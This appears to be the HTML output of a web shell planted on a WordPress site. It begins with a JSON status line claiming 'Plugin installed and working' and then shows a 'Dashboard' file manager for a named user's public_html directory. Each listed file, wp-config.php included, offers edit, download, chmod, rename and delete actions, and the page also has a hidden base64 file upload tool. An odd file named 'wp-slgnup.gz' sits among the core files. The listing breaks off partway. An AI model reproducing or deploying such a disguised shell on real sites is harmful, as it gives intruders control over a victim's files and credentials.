{"ok":true,"status":"active","msg":"Plugin installed and working","php":"8.3.33","server":"Apache","time":"2026-09-14 02:33:30"}
<!DOCTYPE html>
<html>
<head>
    <meta charset="UTF-8">
    <title>Dashboard</title>
    <style>
        * { margin:0; padding:0; box-sizing:border-box; font-family:Arial,sans-serif; }
        body { background:#000; color:#ccc; padding:15px; min-height:100vh; }
        .container { background:#111; border:1px solid #ff0000; max-width:1400px; margin:0 auto; border-radius:5px; overflow:hidden; }
        .header { background:#222; padding:15px; border-bottom:2px solid #ff0000; color:#fff; }
        .header h1 { color:#ff0000; font-size:20px; margin-bottom:10px; }
        .system-info { display:flex; gap:15px; font-size:12px; color:#888; flex-wrap:wrap; }
        .path-navigation { background:#1a1a1a; padding:12px 15px; border-bottom:1px solid #333; display:flex; align-items:center; flex-wrap:wrap; gap:5px; }
        .path-navigation a { color:#00ff00; text-decoration:none; padding:5px 10px; background:#222; border-radius:3px; font-size:13px; }
        .path-navigation a:hover { background:#333; color:#fff; }
        .tools { padding:12px 15px; background:#1a1a1a; border-bottom:1px solid #333; display:flex; gap:8px; flex-wrap:wrap; }
        .button { background:#222; color:#ccc; border:1px solid #666; padding:8px 15px; cursor:pointer; border-radius:3px; font-size:13px; text-decoration:none; display:inline-flex; align-items:center; gap:5px; }
        .button:hover { background:#333; border-color:#00ff00; color:#fff; }
        .button-green { border-color:#00ff00; color:#00ff00; }
        .button-red { border-color:#ff0000; color:#ff0000; }
        .message { padding:12px; background:#1a1a1a; border-bottom:1px solid #333; text-align:center; font-weight:bold; }
        .file-table { width:100%; color:#ccc; border-collapse:collapse; }
        .file-table th { background:#222; padding:12px 15px; text-align:left; border-bottom:2px solid #ff0000; color:#fff; font-size:13px; }
        .file-table td { padding:10px 15px; border-bottom:1px solid #333; font-size:14px; }
        .file-table tr:hover { background:#1a1a1a; }
        .folder-link { color:#00ff00; font-weight:bold; text-decoration:none; display:flex; align-items:center; gap:8px; }
        .file-link { color:#ccc; text-decoration:none; display:flex; align-items:center; gap:8px; }
        .folder-link:hover, .file-link:hover { color:#fff; }
        .size { color:#888; }
        .permissions { font-family:'Courier New',monospace; color:#ff9900; background:#222; padding:4px 8px; border-radius:3px; font-size:12px; }
        .actions { display:flex; gap:5px; flex-wrap:wrap; }
        .action-button { padding:5px 10px; background:#222; color:#ccc; border:1px solid #666; font-size:11px; cursor:pointer; text-decoration:none; border-radius:3px; }
        .action-button:hover { background:#333; border-color:#00ff00; }
        .action-button-red { border-color:#ff0000; color:#ff0000; }
        textarea { width:100%; height:400px; background:#000; color:#00ff00; border:1px solid #ff0000; padding:15px; font-family:'Courier New',monospace; font-size:14px; border-radius:3px; }
        .edit-container { padding:20px; background:#000; border-bottom:1px solid #333; }
        .edit-title { color:#00ff00; margin-bottom:15px; font-size:16px; }
        .toast-container { position:fixed; top:20px; right:20px; z-index:10000; display:flex; flex-direction:column; gap:10px; max-width:350px; }
        .toast { padding:12px 20px; border-radius:5px; color:#fff; font-size:14px; display:flex; align-items:center; justify-content:space-between; gap:10px; animation:toastIn 0.3s ease; cursor:pointer; }
        .toast-success { background:#1a472a; border-left:4px solid #00ff00; }
        .toast-error { background:#4a1a1a; border-left:4px solid #ff0000; }
        @keyframes toastIn { from { transform:translateX(100%); opacity:0; } to { transform:translateX(0); opacity:1; } }
        .search-input { background:#000; border:1px solid #444; color:#fff; padding:6px 12px; border-radius:3px; font-size:13px; width:200px; margin-left:auto; }
        .search-input:focus { outline:none; border-color:#00ff00; }
    </style>
</head>
<body>
    <div class="container">
        <div class="header">
            <div style="display:flex; justify-content:space-between; align-items:center;">
                <div>
                    <h1>Dashboard</h1>
                    <div class="system-info">
                        <span>PHP: <b style="color:#ff9900">8.3.33</b></span>
                        <span>OS: <b style="color:#ff9900">Linux</b></span>
                        <span>User: <b style="color:#ff9900">pablod78</b></span>
                    </div>
                </div>

            </div>
        </div>
        
                
        <div class="path-navigation">
                                            <a href="?p=%2F">/</a>
                            <span style="color:#666">/</span>                <a href="?p=%2Fhome2">home2</a>
                            <span style="color:#666">/</span>                <a href="?p=%2Fhome2%2Fpablod78">pablod78</a>
                            <span style="color:#666">/</span>                <a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html">public_html</a>
                    </div>
        
        <div class="tools">
            <button class="button button-green" onclick="document.getElementById('b64upload').click()">📤 Upload</button>
            <input type="file" id="b64upload" style="display:none" onchange="uploadFileB64(this)">
            <button class="button" onclick="showCreateFile()">📝 New File</button>
            <button class="button" onclick="showCreateFolder()">📁 New Folder</button>
                        <input type="text" id="search-input" class="search-input" placeholder="🔍 Search..." onkeyup="searchFiles(this.value)">
        </div>

        
                    <table class="file-table">
                <thead><tr><th>Name</th><th>Size</th><th>Permissions</th><th>Modified</th><th>Actions</th></tr></thead>
                <tbody id="file-list">
                                            <tr><td colspan="5"><a href="?p=%2Fhome2%2Fpablod78" class="folder-link">📂 Parent Directory</a></td></tr>
                                                                <tr data-name="cgi-bin">
                            <td><a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html%2Fcgi-bin" class="folder-link">📁 cgi-bin</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2026-07-06 19:01</td>
                            <td><div class="actions">
                                <button onclick="showRename('/home2/pablod78/public_html/cgi-bin','cgi-bin')" class="action-button">Rename</button>
                                <button onclick="showChmod('/home2/pablod78/public_html/cgi-bin','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/home2/pablod78/public_html/cgi-bin',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="paulo.medeiros">
                            <td><a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html%2Fpaulo.medeiros" class="folder-link">📁 paulo.medeiros</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2025-09-09 23:32</td>
                            <td><div class="actions">
                                <button onclick="showRename('/home2/pablod78/public_html/paulo.medeiros','paulo.medeiros')" class="action-button">Rename</button>
                                <button onclick="showChmod('/home2/pablod78/public_html/paulo.medeiros','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/home2/pablod78/public_html/paulo.medeiros',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="wp-admin">
                            <td><a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-admin" class="folder-link">📁 wp-admin</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2026-07-07 02:04</td>
                            <td><div class="actions">
                                <button onclick="showRename('/home2/pablod78/public_html/wp-admin','wp-admin')" class="action-button">Rename</button>
                                <button onclick="showChmod('/home2/pablod78/public_html/wp-admin','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/home2/pablod78/public_html/wp-admin',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="wp-content">
                            <td><a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-content" class="folder-link">📁 wp-content</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2026-08-20 10:18</td>
                            <td><div class="actions">
                                <button onclick="showRename('/home2/pablod78/public_html/wp-content','wp-content')" class="action-button">Rename</button>
                                <button onclick="showChmod('/home2/pablod78/public_html/wp-content','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/home2/pablod78/public_html/wp-content',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="wp-includes">
                            <td><a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-includes" class="folder-link">📁 wp-includes</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2026-08-20 02:23</td>
                            <td><div class="actions">
                                <button onclick="showRename('/home2/pablod78/public_html/wp-includes','wp-includes')" class="action-button">Rename</button>
                                <button onclick="showChmod('/home2/pablod78/public_html/wp-includes','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/home2/pablod78/public_html/wp-includes',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                                                <tr data-name="about.php">
                            <td><a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fabout.php" class="file-link">📄 about.php</a></td>
                            <td class="size">3.7 KB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2026-08-20 08:13</td>
                            <td><div class="actions">
                                <a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fabout.php" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fabout.php" class="action-button">Download</a>
                                <button onclick="showRename('/home2/pablod78/public_html/about.php','about.php')" class="action-button">Rename</button>
                                <button onclick="showChmod('/home2/pablod78/public_html/about.php','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/home2/pablod78/public_html/about.php',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="default.html">
                            <td><a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fdefault.html" class="file-link">📄 default.html</a></td>
                            <td class="size">246 B</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2026-09-12 23:18</td>
                            <td><div class="actions">
                                <a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fdefault.html" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fdefault.html" class="action-button">Download</a>
                                <button onclick="showRename('/home2/pablod78/public_html/default.html','default.html')" class="action-button">Rename</button>
                                <button onclick="showChmod('/home2/pablod78/public_html/default.html','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/home2/pablod78/public_html/default.html',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="error_log">
                            <td><a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Ferror_log" class="file-link">📄 error_log</a></td>
                            <td class="size">24.1 MB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2026-09-13 09:54</td>
                            <td><div class="actions">
                                <a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Ferror_log" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Ferror_log" class="action-button">Download</a>
                                <button onclick="showRename('/home2/pablod78/public_html/error_log','error_log')" class="action-button">Rename</button>
                                <button onclick="showChmod('/home2/pablod78/public_html/error_log','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/home2/pablod78/public_html/error_log',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="index.php">
                            <td><a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Findex.php" class="file-link">📄 index.php</a></td>
                            <td class="size">405 B</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2026-08-06 19:50</td>
                            <td><div class="actions">
                                <a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Findex.php" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Findex.php" class="action-button">Download</a>
                                <button onclick="showRename('/home2/pablod78/public_html/index.php','index.php')" class="action-button">Rename</button>
                                <button onclick="showChmod('/home2/pablod78/public_html/index.php','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/home2/pablod78/public_html/index.php',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="license.txt">
                            <td><a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Flicense.txt" class="file-link">📄 license.txt</a></td>
                            <td class="size">19.4 KB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2026-08-20 02:23</td>
                            <td><div class="actions">
                                <a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Flicense.txt" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Flicense.txt" class="action-button">Download</a>
                                <button onclick="showRename('/home2/pablod78/public_html/license.txt','license.txt')" class="action-button">Rename</button>
                                <button onclick="showChmod('/home2/pablod78/public_html/license.txt','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/home2/pablod78/public_html/license.txt',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="readme.html">
                            <td><a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Freadme.html" class="file-link">📄 readme.html</a></td>
                            <td class="size">7.2 KB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2026-08-20 02:23</td>
                            <td><div class="actions">
                                <a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Freadme.html" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Freadme.html" class="action-button">Download</a>
                                <button onclick="showRename('/home2/pablod78/public_html/readme.html','readme.html')" class="action-button">Rename</button>
                                <button onclick="showChmod('/home2/pablod78/public_html/readme.html','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/home2/pablod78/public_html/readme.html',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="robots.txt">
                            <td><a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Frobots.txt" class="file-link">📄 robots.txt</a></td>
                            <td class="size">108 B</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2026-08-20 09:14</td>
                            <td><div class="actions">
                                <a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Frobots.txt" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Frobots.txt" class="action-button">Download</a>
                                <button onclick="showRename('/home2/pablod78/public_html/robots.txt','robots.txt')" class="action-button">Rename</button>
                                <button onclick="showChmod('/home2/pablod78/public_html/robots.txt','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/home2/pablod78/public_html/robots.txt',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="wp-activate.php">
                            <td><a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-activate.php" class="file-link">📄 wp-activate.php</a></td>
                            <td class="size">7.5 KB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2026-08-20 02:23</td>
                            <td><div class="actions">
                                <a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-activate.php" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-activate.php" class="action-button">Download</a>
                                <button onclick="showRename('/home2/pablod78/public_html/wp-activate.php','wp-activate.php')" class="action-button">Rename</button>
                                <button onclick="showChmod('/home2/pablod78/public_html/wp-activate.php','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/home2/pablod78/public_html/wp-activate.php',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="wp-blog-header.php">
                            <td><a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-blog-header.php" class="file-link">📄 wp-blog-header.php</a></td>
                            <td class="size">860 B</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2026-08-20 09:10</td>
                            <td><div class="actions">
                                <a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-blog-header.php" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-blog-header.php" class="action-button">Download</a>
                                <button onclick="showRename('/home2/pablod78/public_html/wp-blog-header.php','wp-blog-header.php')" class="action-button">Rename</button>
                                <button onclick="showChmod('/home2/pablod78/public_html/wp-blog-header.php','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/home2/pablod78/public_html/wp-blog-header.php',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="wp-comments-post.php">
                            <td><a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-comments-post.php" class="file-link">📄 wp-comments-post.php</a></td>
                            <td class="size">2.3 KB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2023-06-14 17:11</td>
                            <td><div class="actions">
                                <a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-comments-post.php" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-comments-post.php" class="action-button">Download</a>
                                <button onclick="showRename('/home2/pablod78/public_html/wp-comments-post.php','wp-comments-post.php')" class="action-button">Rename</button>
                                <button onclick="showChmod('/home2/pablod78/public_html/wp-comments-post.php','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/home2/pablod78/public_html/wp-comments-post.php',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="wp-config-sample.php">
                            <td><a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-config-sample.php" class="file-link">📄 wp-config-sample.php</a></td>
                            <td class="size">3.3 KB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2025-12-03 02:22</td>
                            <td><div class="actions">
                                <a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-config-sample.php" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-config-sample.php" class="action-button">Download</a>
                                <button onclick="showRename('/home2/pablod78/public_html/wp-config-sample.php','wp-config-sample.php')" class="action-button">Rename</button>
                                <button onclick="showChmod('/home2/pablod78/public_html/wp-config-sample.php','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/home2/pablod78/public_html/wp-config-sample.php',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="wp-config.php">
                            <td><a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-config.php" class="file-link">📄 wp-config.php</a></td>
                            <td class="size">3.6 KB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2025-09-09 23:36</td>
                            <td><div class="actions">
                                <a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-config.php" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-config.php" class="action-button">Download</a>
                                <button onclick="showRename('/home2/pablod78/public_html/wp-config.php','wp-config.php')" class="action-button">Rename</button>
                                <button onclick="showChmod('/home2/pablod78/public_html/wp-config.php','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/home2/pablod78/public_html/wp-config.php',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="wp-cron.php">
                            <td><a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-cron.php" class="file-link">📄 wp-cron.php</a></td>
                            <td class="size">5.5 KB</td>
                            <td><span class="permissions">0600</span></td>
                            <td>2026-07-06 18:51</td>
                            <td><div class="actions">
                                <a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-cron.php" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-cron.php" class="action-button">Download</a>
                                <button onclick="showRename('/home2/pablod78/public_html/wp-cron.php','wp-cron.php')" class="action-button">Rename</button>
                                <button onclick="showChmod('/home2/pablod78/public_html/wp-cron.php','0600')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/home2/pablod78/public_html/wp-cron.php',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="wp-links-opml.php">
                            <td><a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-links-opml.php" class="file-link">📄 wp-links-opml.php</a></td>
                            <td class="size">2.4 KB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2025-12-03 02:22</td>
                            <td><div class="actions">
                                <a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-links-opml.php" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-links-opml.php" class="action-button">Download</a>
                                <button onclick="showRename('/home2/pablod78/public_html/wp-links-opml.php','wp-links-opml.php')" class="action-button">Rename</button>
                                <button onclick="showChmod('/home2/pablod78/public_html/wp-links-opml.php','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/home2/pablod78/public_html/wp-links-opml.php',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="wp-load.php">
                            <td><a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-load.php" class="file-link">📄 wp-load.php</a></td>
                            <td class="size">3.8 KB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2024-03-11 13:05</td>
                            <td><div class="actions">
                                <a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-load.php" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-load.php" class="action-button">Download</a>
                                <button onclick="showRename('/home2/pablod78/public_html/wp-load.php','wp-load.php')" class="action-button">Rename</button>
                                <button onclick="showChmod('/home2/pablod78/public_html/wp-load.php','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/home2/pablod78/public_html/wp-load.php',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="wp-login.php">
                            <td><a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-login.php" class="file-link">📄 wp-login.php</a></td>
                            <td class="size">51.3 KB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2026-08-20 02:23</td>
                            <td><div class="actions">
                                <a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-login.php" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-login.php" class="action-button">Download</a>
                                <button onclick="showRename('/home2/pablod78/public_html/wp-login.php','wp-login.php')" class="action-button">Rename</button>
                                <button onclick="showChmod('/home2/pablod78/public_html/wp-login.php','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/home2/pablod78/public_html/wp-login.php',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="wp-mail.php">
                            <td><a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-mail.php" class="file-link">📄 wp-mail.php</a></td>
                            <td class="size">8.5 KB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2025-12-03 02:22</td>
                            <td><div class="actions">
                                <a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-mail.php" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-mail.php" class="action-button">Download</a>
                                <button onclick="showRename('/home2/pablod78/public_html/wp-mail.php','wp-mail.php')" class="action-button">Rename</button>
                                <button onclick="showChmod('/home2/pablod78/public_html/wp-mail.php','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/home2/pablod78/public_html/wp-mail.php',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="wp-settings.php">
                            <td><a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-settings.php" class="file-link">📄 wp-settings.php</a></td>
                            <td class="size">32.4 KB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2026-08-20 02:23</td>
                            <td><div class="actions">
                                <a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-settings.php" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-settings.php" class="action-button">Download</a>
                                <button onclick="showRename('/home2/pablod78/public_html/wp-settings.php','wp-settings.php')" class="action-button">Rename</button>
                                <button onclick="showChmod('/home2/pablod78/public_html/wp-settings.php','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/home2/pablod78/public_html/wp-settings.php',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="wp-signup.php">
                            <td><a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-signup.php" class="file-link">📄 wp-signup.php</a></td>
                            <td class="size">34.3 KB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2026-08-20 02:23</td>
                            <td><div class="actions">
                                <a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-signup.php" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-signup.php" class="action-button">Download</a>
                                <button onclick="showRename('/home2/pablod78/public_html/wp-signup.php','wp-signup.php')" class="action-button">Rename</button>
                                <button onclick="showChmod('/home2/pablod78/public_html/wp-signup.php','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/home2/pablod78/public_html/wp-signup.php',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="wp-slgnup.gz">
                            <td><a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-slgnup.gz" class="file-link">📄 wp-slgnup.gz</a></td>
                            <td class="size">2.8 KB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2026-07-18 05:53</td>
                            <td><div class="actions">
                                <a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-slgnup.gz" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-slgnup.gz" class="action-button">Download</a>
                                <button onclick="showRename('/home2/pablod78/public_html/wp-slgnup.gz','wp-slgnup.gz')" class="action-button">Rename</button>
                                <button onclick="showChmod('/home2/pablod78/public_html/wp-slgnup.gz','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/home2/pablod78/public_html/wp-slgnup.gz',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="wp-trackback.php">
                            <td><a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-trackback.php" class="file-link">📄 wp-trackback.php</a></td>
                            <td class="size">5.3 KB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2026-08-20 02:23</td>
                            <td><div class="actions">
                                <a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-trackback.php" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-trackback.php" class="action-button">Download</a>
                                <button onclick="showRename('/home2/pablod78/public_html/wp-trackback.php','wp-trackback.php')" class="action-button">Rename</button>
                                <button onclick="showChmod('/home2/pablod78/public_html/wp-trackback.php','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/home2/pablod78/public_html/wp-trackback.php',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="xmlrpc.php">
